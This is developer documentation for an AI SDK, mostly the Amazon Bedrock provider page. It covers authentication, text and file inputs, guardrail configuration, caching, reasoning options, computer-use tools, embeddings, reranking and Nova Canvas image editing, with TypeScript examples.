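  model: openResponses('mistralai/ministral-3-14b-reasoning'),
  output: Output.object({
    schema: z.object({
      holiday: z.string(),
      traditions: z.array(z.string()),
    }),
  }),
  prompt: 'Invent a new holiday and describe its traditions.',
});

console.log(result.output);
```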
Notes
- Stop sequences, `topK`, and `seed` are not supported and are ignored with warnings.
- Image inputs are supported for user messages with `file` parts using image media types.
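A minimal sketch of the image-input note above (it assumes the endpoint serves a vision-capable model and that a local `./image.png` exists):

```ts
import { createOpenResponses } from '@ai-sdk/open-responses';
import { generateText } from 'ai';
import { readFileSync } from 'node:fs';

const openResponses = createOpenResponses({
  name: 'aProvider',
  url: 'http://localhost:1234/v1/responses',
});

// Pass an image as a file part with an image media type.
const { text } = await generateText({
  model: openResponses('mistralai/ministral-3-14b-reasoning'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What is in this image?' },
        {
          type: 'file',
          data: readFileSync('./image.png'),
          mediaType: 'image/png',
        },
      ],
    },
  ],
});
```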
---
title: Amazon Bedrock
description: Learn how to use the Amazon Bedrock provider.
---
Amazon Bedrock Provider
The Amazon Bedrock provider for the AI SDK contains language model support for the Amazon Bedrock APIs.
Setup
The Bedrock provider is available in the @ai-sdk/amazon-bedrock module. You can install it with
pnpm add @ai-sdk/amazon-bedrock
Prerequisites
Access to Amazon Bedrock foundation models isn't granted by default. In order to gain access to a foundation model, an IAM user with sufficient permissions needs to request access to it through the console. Once access is provided to a model, it is available for all users in the account.
See the Model Access Docs for more information.
Authentication
Using IAM Access Key and Secret Key
Step 1: Creating AWS Access Key and Secret Key
To get started, you'll need to create an AWS access key and secret key. Here's how:
Login to AWS Management Console
- Go to the AWS Management Console and log in with your AWS account credentials.
Create an IAM User
- Navigate to the IAM dashboard and click on "Users" in the left-hand navigation menu.
- Click on "Create user" and fill in the required details to create a new IAM user.
- Make sure to select "Programmatic access" as the access type.
- The user account needs the `AmazonBedrockFullAccess` policy attached to it.
Create Access Key
- Click on the "Security credentials" tab and then click on "Create access key".
- Click "Create access key" to generate a new access key pair.
- Download the `.csv` file containing the access key ID and secret access key.
Step 2: Configuring the Access Key and Secret Key
Within your project, add a `.env` file if you don't already have one. This file will be used to set the access key and secret key as environment variables. Add the following lines to the `.env` file:
AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY=YOUR_SECRET_ACCESS_KEY
AWS_REGION=YOUR_REGION
Remember to replace YOUR_ACCESS_KEY_ID, YOUR_SECRET_ACCESS_KEY, and YOUR_REGION with the actual values from your AWS account.
Using AWS SDK Credentials Chain (instance profiles, instance roles, ECS roles, EKS Service Accounts, etc.)
When using the AWS SDK, the SDK will automatically use the credentials chain to determine which credentials to use. This includes instance profiles, instance roles, ECS roles, EKS Service Accounts, etc. A similar behavior is possible with the AI SDK by not specifying the `accessKeyId`, `secretAccessKey`, and `sessionToken` properties in the provider settings and instead passing a `credentialProvider` property.
Usage:

The `@aws-sdk/credential-providers` package provides a set of credential providers that can be used to create a credential provider chain. You can install it with

pnpm add @aws-sdk/credential-providers
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
import { fromNodeProviderChain } from '@aws-sdk/credential-providers';
const bedrock = createAmazonBedrock({
region: 'us-east-1',
credentialProvider: fromNodeProviderChain(),
});
Provider Instance
You can import the default provider instance bedrock from @ai-sdk/amazon-bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
If you need a customized setup, you can import createAmazonBedrock from @ai-sdk/amazon-bedrock and create a provider instance with your settings:
import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
const bedrock = createAmazonBedrock({
region: 'us-east-1',
accessKeyId: 'xxxxxxxxx',
secretAccessKey: 'xxxxxxxxx',
sessionToken: 'xxxxxxxxx',
});
You can use the following optional settings to customize the Amazon Bedrock provider instance:
- `region` string: The AWS region that you want to use for the API calls. It uses the `AWS_REGION` environment variable by default.
- `accessKeyId` string: The AWS access key ID that you want to use for the API calls. It uses the `AWS_ACCESS_KEY_ID` environment variable by default.
- `secretAccessKey` string: The AWS secret access key that you want to use for the API calls. It uses the `AWS_SECRET_ACCESS_KEY` environment variable by default.
- `sessionToken` string: Optional. The AWS session token that you want to use for the API calls. It uses the `AWS_SESSION_TOKEN` environment variable by default.
- `credentialProvider` () => Promise<{ accessKeyId: string; secretAccessKey: string; sessionToken?: string; }>: Optional. The AWS credential provider chain that you want to use for the API calls. It uses the specified credentials by default.
- `apiKey` string: Optional. API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the `AWS_BEARER_TOKEN_BEDROCK` environment variable by default.
- `baseURL` string: Optional. Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
- `headers` Record<string, string>: Optional. Custom headers to include in the requests.
- `fetch` (input: RequestInfo, init?: RequestInit) => Promise<Response>: Optional. Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Bedrock API using the provider instance.
The first argument is the model id, e.g. meta.llama3-70b-instruct-v1:0.
const model = bedrock('meta.llama3-70b-instruct-v1:0');
Amazon Bedrock models also support some model specific provider options that are not part of the standard call settings.
You can pass them in the providerOptions argument:
const model = bedrock('anthropic.claude-3-sonnet-20240229-v1:0');
await generateText({
model,
providerOptions: {
anthropic: {
additionalModelRequestFields: { top_k: 350 },
},
},
});
Documentation for additional settings based on the selected model can be found within the Amazon Bedrock Inference Parameter Documentation.
You can use Amazon Bedrock language models to generate text with the generateText function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrock('meta.llama3-70b-instruct-v1:0'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Amazon Bedrock language models can also be used in the streamText function
(see AI SDK Core).
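For example, a minimal streaming sketch:

```ts
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const result = streamText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

// Print the text as it streams in.
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}
```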
File Inputs
The Amazon Bedrock provider supports file inputs, e.g. PDF files.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
import { readFileSync } from 'node:fs';
const result = await generateText({
model: bedrock('anthropic.claude-3-haiku-20240307-v1:0'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe the pdf in detail.' },
{
type: 'file',
data: readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
Guardrails
You can use the bedrock provider options to utilize Amazon Bedrock Guardrails:
import { type AmazonBedrockLanguageModelOptions } from '@ai-sdk/amazon-bedrock';
const result = await generateText({
model: bedrock('anthropic.claude-3-sonnet-20240229-v1:0'),
prompt: 'Write a story about space exploration.',
providerOptions: {
bedrock: {
guardrailConfig: {
guardrailIdentifier: '1abcd2ef34gh',
guardrailVersion: '1',
trace: 'enabled' as const,
streamProcessingMode: 'async',
},
} satisfies AmazonBedrockLanguageModelOptions,
},
});
Tracing information will be returned in the provider metadata if you have tracing enabled.
if (result.providerMetadata?.bedrock?.trace) {
  // ...
}
See the Amazon Bedrock Guardrails documentation for more information.
Citations
Amazon Bedrock supports citations for document-based inputs across compatible models. When enabled:
- Some models can read documents with visual understanding, rather than just extracting text
- Models can cite specific parts of documents you provide, making it easier to trace information back to its source (Not Supported Yet)
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText, Output } from 'ai';
import { z } from 'zod';
import fs from 'fs';
const result = await generateText({
model: bedrock('apac.anthropic.claude-sonnet-4-20250514-v1:0'),
output: Output.object({
schema: z.object({
summary: z.string().describe('Summary of the PDF document'),
keyPoints: z.array(z.string()).describe('Key points from the PDF'),
}),
}),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Summarize this PDF and provide key points.',
},
{
type: 'file',
data: fs.readFileSync('./document.pdf'),
mediaType: 'application/pdf',
providerOptions: {
bedrock: {
citations: { enabled: true },
},
},
},
],
},
],
});
console.log('Response:', result.output);
Cache Points
In messages, you can use the providerOptions property to set cache points. Set the bedrock property in the providerOptions object to { cachePoint: { type: 'default' } } to create a cache point.
You can also specify a TTL (time-to-live) for cache points using the ttl property. Supported values are '5m' (5 minutes, default) and '1h' (1 hour). The 1-hour TTL is only supported by Claude Opus 4.5, Claude Haiku 4.5, and Claude Sonnet 4.5.
providerOptions: {
bedrock: { cachePoint: { type: 'default', ttl: '1h' } },
}
Cache usage information is returned in the providerMetadata object. See examples below.
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const cyberpunkAnalysis =
'... literary analysis of cyberpunk themes and concepts ...';
const result = await generateText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
messages: [
{
role: 'system',
content: `You are an expert on William Gibson's cyberpunk literature and themes. You have access to the following academic analysis: ${cyberpunkAnalysis}`,
providerOptions: {
bedrock: { cachePoint: { type: 'default' } },
},
},
{
role: 'user',
content:
'What are the key cyberpunk themes that Gibson explores in Neuromancer?',
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.bedrock?.usage);
// Shows cache read/write token usage, e.g.:
// {
// cacheReadInputTokens: 1337,
// cacheWriteInputTokens: 42,
// }
Cache points also work with streaming responses:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';
const cyberpunkAnalysis =
'... literary analysis of cyberpunk themes and concepts ...';
const result = streamText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
messages: [
{
role: 'assistant',
content: [
{ type: 'text', text: 'You are an expert on cyberpunk literature.' },
{ type: 'text', text: `Academic analysis: ${cyberpunkAnalysis}` },
],
providerOptions: { bedrock: { cachePoint: { type: 'default' } } },
},
{
role: 'user',
content:
'How does Gibson explore the relationship between humanity and technology?',
},
],
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log(
'Cache token usage:',
(await result.providerMetadata)?.bedrock?.usage,
);
// Shows cache read/write token usage, e.g.:
// {
// cacheReadInputTokens: 1337,
// cacheWriteInputTokens: 42,
// }
Provider Metadata
The following Bedrock-specific metadata may be returned in providerMetadata.bedrock:
- `trace` (optional): Guardrail tracing information (when tracing is enabled).
- `performanceConfig` (optional): Performance configuration, e.g. `{ latency: 'optimized' }`.
- `serviceTier` (optional): Service tier information, e.g. `{ type: 'on-demand' }`.
- `usage` (optional): Cache token usage details including `cacheWriteInputTokens` and `cacheDetails`.
- `stopSequence` string | null: The stop sequence that triggered the stop, if any.
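A minimal sketch of reading these fields from a result (which fields are present depends on the request):

```ts
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt: 'Write a haiku about rain.',
});

// All fields are optional; check before use.
const metadata = result.providerMetadata?.bedrock;
console.log(metadata?.serviceTier); // e.g. { type: 'on-demand' }
console.log(metadata?.usage); // cache token usage details, if any
```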
Reasoning
Amazon Bedrock supports model creator-specific reasoning features:
- Anthropic (e.g. `claude-sonnet-4-5-20250929`): enable via the `reasoningConfig` provider option and specifying a thinking budget in tokens (minimum: `1024`, maximum: `64000`).
- Amazon (e.g. `us.amazon.nova-2-lite-v1:0`): enable via the `reasoningConfig` provider option and specifying a maximum reasoning effort level (`'low' | 'medium' | 'high'`).
import {
bedrock,
type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
// Anthropic example
const anthropicResult = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
bedrock: {
reasoningConfig: { type: 'enabled', budgetTokens: 1024 },
} satisfies AmazonBedrockLanguageModelOptions,
},
});
console.log(anthropicResult.reasoningText); // reasoning text
console.log(anthropicResult.text); // text response
// Nova 2 example
const amazonResult = await generateText({
model: bedrock('us.amazon.nova-2-lite-v1:0'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
bedrock: {
reasoningConfig: { type: 'enabled', maxReasoningEffort: 'medium' },
} satisfies AmazonBedrockLanguageModelOptions,
},
});
console.log(amazonResult.reasoningText); // reasoning text
console.log(amazonResult.text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Service Tiers
Amazon Bedrock supports selecting an inference service tier per request via the serviceTier provider option.
import {
bedrock,
type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
prompt: 'Summarize this support ticket backlog.',
providerOptions: {
bedrock: {
serviceTier: 'priority',
} satisfies AmazonBedrockLanguageModelOptions,
},
});
Supported values are:

- `reserved`
- `priority`
- `default`
- `flex`
See the Amazon Bedrock service tiers documentation for model availability and behavior.
Extended Context Window
Claude Sonnet 4 models on Amazon Bedrock support an extended context window of up to 1 million tokens when using the context-1m-2025-08-07 beta feature.
import {
bedrock,
type AmazonBedrockLanguageModelOptions,
} from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const result = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
prompt: 'analyze this large document...',
providerOptions: {
bedrock: {
anthropicBeta: ['context-1m-2025-08-07'],
} satisfies AmazonBedrockLanguageModelOptions,
},
});
Computer Use
Via Anthropic, Amazon Bedrock provides three provider-defined tools that can be used to interact with external systems:
- Bash Tool: Allows running bash commands.
- Text Editor Tool: Provides functionality for viewing and editing text files.
- Computer Tool: Enables control of keyboard and mouse actions on a computer.
They are available via the tools property of the provider instance.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = bedrock.tools.bash_20241022({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- `command` (string): The bash command to run. Required unless the tool is being restarted.
- `restart` (boolean, optional): Specifying true will restart this tool.
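A minimal sketch of wiring the tool into a multi-step call (the execute body is a placeholder; run the command in your own sandbox instead):

```ts
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20240620-v1:0'),
  prompt: 'List the files in the current directory.',
  tools: {
    bash: bedrock.tools.bash_20241022({
      execute: async ({ command }) => {
        // Placeholder: execute the command in a sandbox and return its output.
        return `Executed: ${command}`;
      },
    }),
  },
  stopWhen: stepCountIs(3),
});

console.log(result.text);
```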
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files.
For Claude 4 models (Opus & Sonnet):
const textEditorTool = bedrock.tools.textEditor_20250429({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
insert_text,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
For Claude 3.5 Sonnet and earlier models:
const textEditorTool = bedrock.tools.textEditor_20241022({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
insert_text,
old_str,
view_range,
}) => {
// Implement your text editing logic here
// Return the result of the text editing operation
},
});
Parameters:
- `command` ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: `undo_edit` is only available in Claude 3.5 Sonnet and earlier models.
- `path` (string): Absolute path to file or directory, e.g. `/repo/file.py` or `/repo`.
- `file_text` (string, optional): Required for the `create` command, with the content of the file to be created.
- `insert_line` (number, optional): Required for the `insert` command. The line number after which to insert the new string.
- `new_str` (string, optional): New string for the `str_replace` command.
- `insert_text` (string, optional): Required for the `insert` command, containing the text to insert.
- `old_str` (string, optional): Required for the `str_replace` command, containing the string to replace.
- `view_range` (number[], optional): Optional for the `view` command to specify the line range to show.
When using the Text Editor Tool, make sure to name the key in the tools object correctly:
- Claude 4 models: Use `str_replace_based_edit_tool`
- Claude 3.5 Sonnet and earlier: Use `str_replace_editor`
// For Claude 4 models
const response = await generateText({
model: bedrock('us.anthropic.claude-sonnet-4-20250514-v1:0'),
prompt:
"Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
str_replace_based_edit_tool: textEditorTool, // Claude 4 tool name
},
});
// For Claude 3.5 Sonnet and earlier
const response = await generateText({
model: bedrock('anthropic.claude-3-5-sonnet-20241022-v2:0'),
prompt:
"Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
str_replace_editor: textEditorTool, // Earlier models tool name
},
});
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
const computerTool = bedrock.tools.computer_20241022({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
execute: async ({ action, coordinate, text }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput({ output }) {
return typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'image', data: output.data, mediaType: 'image/png' }];
},
});
Parameters:
- `action` ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position'): The action to perform.
- `coordinate` (number[], optional): Required for `mouse_move` and `left_click_drag` actions. Specifies the (x, y) coordinates.
- `text` (string, optional): Required for `type` and `key` actions.
These tools can be used in conjunction with the anthropic.claude-3-5-sonnet-20240620-v1:0 model to enable more complex interactions and tasks.
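A minimal sketch of wiring the `computerTool` defined above into a multi-step call:

```ts
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: bedrock('anthropic.claude-3-5-sonnet-20240620-v1:0'),
  prompt: 'Take a screenshot and describe what you see.',
  tools: {
    // computerTool is defined in the snippet above
    computer: computerTool,
  },
  stopWhen: stepCountIs(3),
});

console.log(result.text);
```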
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| amazon.titan-tg1-large | | | | |
| amazon.titan-text-express-v1 | | | | |
| amazon.titan-text-lite-v1 | | | | |
| us.amazon.nova-premier-v1:0 | | | | |
| us.amazon.nova-pro-v1:0 | | | | |
| us.amazon.nova-lite-v1:0 | | | | |
| us.amazon.nova-micro-v1:0 | | | | |
| anthropic.claude-haiku-4-5-20251001-v1:0 | | | | |
| anthropic.claude-sonnet-4-20250514-v1:0 | | | | |
| anthropic.claude-sonnet-4-5-20250929-v1:0 | | | | |
| anthropic.claude-opus-4-20250514-v1:0 | | | | |
| anthropic.claude-opus-4-1-20250805-v1:0 | | | | |
| anthropic.claude-3-5-sonnet-20241022-v2:0 | | | | |
| anthropic.claude-3-5-sonnet-20240620-v1:0 | | | | |
| anthropic.claude-3-opus-20240229-v1:0 | | | | |
| anthropic.claude-3-sonnet-20240229-v1:0 | | | | |
| anthropic.claude-3-haiku-20240307-v1:0 | | | | |
| us.anthropic.claude-sonnet-4-20250514-v1:0 | | | | |
| us.anthropic.claude-sonnet-4-5-20250929-v1:0 | | | | |
| us.anthropic.claude-opus-4-20250514-v1:0 | | | | |
| us.anthropic.claude-opus-4-1-20250805-v1:0 | | | | |
| us.anthropic.claude-3-5-sonnet-20241022-v2:0 | | | | |
| us.anthropic.claude-3-5-sonnet-20240620-v1:0 | | | | |
| us.anthropic.claude-3-sonnet-20240229-v1:0 | | | | |
| us.anthropic.claude-3-opus-20240229-v1:0 | | | | |
| us.anthropic.claude-3-haiku-20240307-v1:0 | | | | |
| anthropic.claude-v2 | | | | |
| anthropic.claude-v2:1 | | | | |
| anthropic.claude-instant-v1 | | | | |
| cohere.command-text-v14 | | | | |
| cohere.command-light-text-v14 | | | | |
| cohere.command-r-v1:0 | | | | |
| cohere.command-r-plus-v1:0 | | | | |
| us.deepseek.r1-v1:0 | | | | |
| meta.llama3-8b-instruct-v1:0 | | | | |
| meta.llama3-70b-instruct-v1:0 | | | | |
| meta.llama3-1-8b-instruct-v1:0 | | | | |
| meta.llama3-1-70b-instruct-v1:0 | | | | |
| meta.llama3-1-405b-instruct-v1:0 | | | | |
| meta.llama3-2-1b-instruct-v1:0 | | | | |
| meta.llama3-2-3b-instruct-v1:0 | | | | |
| meta.llama3-2-11b-instruct-v1:0 | | | | |
| meta.llama3-2-90b-instruct-v1:0 | | | | |
| us.meta.llama3-2-1b-instruct-v1:0 | | | | |
| us.meta.llama3-2-3b-instruct-v1:0 | | | | |
| us.meta.llama3-2-11b-instruct-v1:0 | | | | |
| us.meta.llama3-2-90b-instruct-v1:0 | | | | |
| us.meta.llama3-1-8b-instruct-v1:0 | | | | |
| us.meta.llama3-1-70b-instruct-v1:0 | | | | |
| us.meta.llama3-3-70b-instruct-v1:0 | | | | |
| us.meta.llama4-scout-17b-instruct-v1:0 | | | | |
| us.meta.llama4-maverick-17b-instruct-v1:0 | | | | |
| mistral.mistral-7b-instruct-v0:2 | | | | |
| mistral.mixtral-8x7b-instruct-v0:1 | | | | |
| mistral.mistral-large-2402-v1:0 | | | | |
| mistral.mistral-small-2402-v1:0 | | | | |
| us.mistral.pixtral-large-2502-v1:0 | | | | |
| openai.gpt-oss-120b-1:0 | | | | |
| openai.gpt-oss-20b-1:0 | | | | |
Embedding Models
You can create models that call the Bedrock API
using the `.embedding()` factory method.
const model = bedrock.embedding('amazon.titan-embed-text-v1');
Bedrock Titan embedding model `amazon.titan-embed-text-v2:0` supports several additional settings. You can pass them via the `providerOptions` argument:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';
const model = bedrock.embedding('amazon.titan-embed-text-v2:0');
const { embedding } = await embed({
model,
value: 'sunny day at the beach',
providerOptions: {
bedrock: {
dimensions: 512, // optional, number of dimensions for the embedding
normalize: true, // optional, normalize the output embeddings
} satisfies AmazonBedrockEmbeddingModelOptions,
},
});
The following optional provider options are available for Bedrock Titan embedding models:
- `dimensions` number: The number of dimensions the output embeddings should have. The following values are accepted: 1024 (default), 512, 256.
- `normalize` boolean: Flag indicating whether or not to normalize the output embeddings. Defaults to true.
Nova Embedding Models
Amazon Nova embedding models support additional provider options:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';
const { embedding } = await embed({
model: bedrock.embedding('amazon.nova-embed-text-v2:0'),
value: 'sunny day at the beach',
providerOptions: {
bedrock: {
embeddingDimension: 1024, // optional, number of dimensions
embeddingPurpose: 'TEXT_RETRIEVAL', // optional, purpose of embedding
truncate: 'END', // optional, truncation behavior
} satisfies AmazonBedrockEmbeddingModelOptions,
},
});
The following optional provider options are available for Nova embedding models:
- `embeddingDimension` number: The number of dimensions for the output embeddings. Supported values: 256, 384, 1024 (default), 3072.
- `embeddingPurpose` string: The purpose of the embedding. Accepts: `GENERIC_INDEX` (default), `TEXT_RETRIEVAL`, `IMAGE_RETRIEVAL`, `VIDEO_RETRIEVAL`, `DOCUMENT_RETRIEVAL`, `AUDIO_RETRIEVAL`, `GENERIC_RETRIEVAL`, `CLASSIFICATION`, `CLUSTERING`.
- `truncate` string: Truncation behavior when input exceeds the model's context length. Accepts: `NONE`, `START`, `END` (default).
Cohere Embedding Models
Cohere embedding models on Bedrock require an inputType and support truncation:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { type AmazonBedrockEmbeddingModelOptions } from '@ai-sdk/amazon-bedrock';
import { embed } from 'ai';
const { embedding } = await embed({
model: bedrock.embedding('cohere.embed-english-v3'),
value: 'sunny day at the beach',
providerOptions: {
bedrock: {
inputType: 'search_document', // required for Cohere
truncate: 'END', // optional, truncation behavior
} satisfies AmazonBedrockEmbeddingModelOptions,
},
});
The following provider options are available for Cohere embedding models:
- `inputType` string: Input type for Cohere embedding models. Accepts: `search_document`, `search_query` (default), `classification`, `clustering`.
- `truncate` string: Truncation behavior when input exceeds the model's context length. Accepts: `NONE`, `START`, `END`.
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| amazon.titan-embed-text-v1 | 1536 | |
| amazon.titan-embed-text-v2:0 | 1024 | |
| amazon.nova-embed-text-v2:0 | 1024 | |
| cohere.embed-english-v3 | 1024 | |
| cohere.embed-multilingual-v3 | 1024 | |
Reranking Models
You can create models that call the Bedrock Rerank API
using the .reranking() factory method.
const model = bedrock.reranking('cohere.rerank-v3-5:0');
You can use Amazon Bedrock reranking models to rerank documents with the rerank function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { rerank } from 'ai';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { ranking } = await rerank({
model: bedrock.reranking('cohere.rerank-v3-5:0'),
documents,
query: 'talk about rain',
topN: 2,
});
console.log(ranking);
// [
// { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
// { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]
Amazon Bedrock reranking models support additional provider options that can be passed via providerOptions.bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { rerank } from 'ai';
const { ranking } = await rerank({
model: bedrock.reranking('cohere.rerank-v3-5:0'),
documents: ['sunny day at the beach', 'rainy afternoon in the city'],
query: 'talk about rain',
providerOptions: {
bedrock: {
nextToken: 'pagination_token_here',
},
},
});
The following provider options are available:
- `nextToken` string: Token for pagination of results.
- `additionalModelRequestFields` Record<string, unknown>: Additional model-specific request fields.
Model Capabilities
| Model |
|---|
| amazon.rerank-v1:0 |
| cohere.rerank-v3-5:0 |
Image Models
You can create models that call the Bedrock API
using the `.image()` factory method.
For more on the Amazon Nova Canvas image model, see the Nova Canvas Overview.
const model = bedrock.image('amazon.nova-canvas-v1:0');
You can then generate images with the generateImage function:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
});
You can also pass the providerOptions object to the generateImage function to customize the generation behavior:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: 'A beautiful sunset over a calm ocean',
size: '512x512',
seed: 42,
providerOptions: {
bedrock: {
quality: 'premium',
negativeText: 'blurry, low quality',
cfgScale: 7.5,
style: 'PHOTOREALISM',
},
},
});
The following optional provider options are available for Amazon Nova Canvas:
- `quality` string: The quality level for image generation. Accepts `'standard'` or `'premium'`.
- `negativeText` string: Text describing what you don't want in the generated image.
- `cfgScale` number: Controls how closely the generated image adheres to the prompt. Higher values result in images that are more closely aligned to the prompt.
- `style` string: Predefined visual style for image generation. Accepts one of: `3D_ANIMATED_FAMILY_FILM`, `DESIGN_SKETCH`, `FLAT_VECTOR_ILLUSTRATION`, `GRAPHIC_NOVEL_ILLUSTRATION`, `MAXIMALISM`, `MIDCENTURY_RETRO`, `PHOTOREALISM`, `SOFT_DIGITAL_PAINTING`.
Documentation for additional settings can be found within the Amazon Bedrock User Guide for Amazon Nova Documentation.
Image Editing
Amazon Nova Canvas supports several image editing task types. When you provide input images via prompt.images, the model automatically detects the appropriate editing mode, or you can explicitly specify the taskType in provider options.
Image Variation
Create variations of an existing image while maintaining its core characteristics:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateImage } from 'ai';
import { readFileSync } from 'node:fs';

const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
text: 'Modernize the style, photo-realistic, 8k, hdr',
images: [imageBuffer],
},
providerOptions: {
bedrock: {
taskType: 'IMAGE_VARIATION',
similarityStrength: 0.7, // 0-1, higher = closer to original
negativeText: 'bad quality, low resolution',
},
},
});
- `similarityStrength` number: Controls how similar the output is to the input image. Values range from 0 to 1, where higher values produce results closer to the original.
Inpainting
Edit specific parts of an image. You can define the area to modify using either a mask image or a text prompt:
Using a mask prompt (text-based selection):
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
text: 'a cute corgi dog in the same style',
images: [imageBuffer],
},
providerOptions: {
bedrock: {
maskPrompt: 'cat', // Describe what to replace
},
},
seed: 42,
});
Using a mask image:
const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // White pixels = area to change
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask: mask,
},
});
- `maskPrompt` string: A text description of the area to modify. The model will automatically identify and mask the described region.
Outpainting
Extend an image beyond its original boundaries:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
text: 'A beautiful sunset landscape with mountains',
images: [imageBuffer],
},
providerOptions: {
bedrock: {
taskType: 'OUTPAINTING',
maskPrompt: 'background',
outPaintingMode: 'DEFAULT', // or 'PRECISE'
},
},
});
- `outPaintingMode` string: Controls how the outpainting is performed. Accepts `'DEFAULT'` or `'PRECISE'`.
Background Removal
Remove the background from an image:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: bedrock.image('amazon.nova-canvas-v1:0'),
prompt: {
images: [imageBuffer],
},
providerOptions: {
bedrock: {
taskType: 'BACKGROUND_REMOVAL',
},
},
});
Image Editing Provider Options
